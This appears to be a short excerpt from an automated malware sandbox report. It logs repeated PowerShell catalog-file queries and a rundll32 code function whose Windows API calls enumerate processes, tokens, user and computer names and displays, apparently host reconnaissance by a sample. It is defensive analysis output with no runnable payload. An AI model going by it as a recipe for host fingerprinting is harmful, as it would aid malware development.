Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A09C20 RegQueryValueExA,GetModuleFileNameW,lstrcpyW,lstrlenW,lstrlenW,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,GetEnvironmentVariableW,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,GetCurrentProcessId,GetCurrentProcessId,ProcessIdToSessionId,GetTickCount,GetModuleHandleA,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetProcessWindowStation,GetUserObjectInformationW,GetUserObjectInformationW,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationW,GetUserNameW,GetComputerNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,Process32FirstW,Process32NextW,lstrcpynW,CloseHandle,WTSGetActiveConsoleSessionId,lstrcpyA,CreateDCA,CreateDCA,GetDeviceCaps,GetDeviceCaps,GetDesktopWindow,GetDesktopWindow,MonitorFromWindow,MonitorFromWindow,GetDesktopWindow,MonitorFromWindow,LoadLibraryA, | 7_2_04A09C20 |